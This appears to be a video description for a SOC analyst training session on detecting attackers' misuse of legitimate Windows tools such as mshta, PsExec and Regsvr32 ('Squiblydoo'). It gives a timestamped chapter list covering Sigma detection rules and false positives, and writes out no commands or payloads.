SOC Analyst Training: How SOC analysts can detect threat actors abusing legit tools

Good apps gone bad? 😈 Security researchers Ryan Robinson and Nicole Fishbein dig in As a SOC analyst, you need to be familiar with how trusted tools are misused by attackers. You ALSO need to know which detection methods will be effective in your environment and trigger alerts when attackers are using legitimate tools. But it is very challenging to detect the usage of legitimate applications by attackers while avoiding false positive alerts and alert fatigue. Since these applications are frequently used by the system and endpoint users, it is harder to detect when an application is exploited by attackers and issue an alert. Check out our blog for more about detecting and hunting legit applications that are being used for malicious purposes: https://www.intezer.com/blog/incident... 2:00 Life hack examples: Using (or misusing!) items in completely new ways 5:12 Is the tool in the hands of a trusted user, or deployed by someone with malicious intent? 7:18 Detecting malicious mshta.exe (Using a legitimate and signed binary as mshta gives attackers the means to execute arbitrary code stored on a remote server while bypassing browser security settings.) 12:16 Using Sigma for creating a detection rule to catch misuse of mshta 16:35 How malicious actors abuse PsExec command-line utility for admins 21:55 Detecting PsExec with Sigma based on behavior 25:58 The struggles of false positives 27:51 Squiblydoo - abusing the Regsvr32 command-line utility 37:29 Offensive security tools - a closer look at Patfish aka Paranoid Fish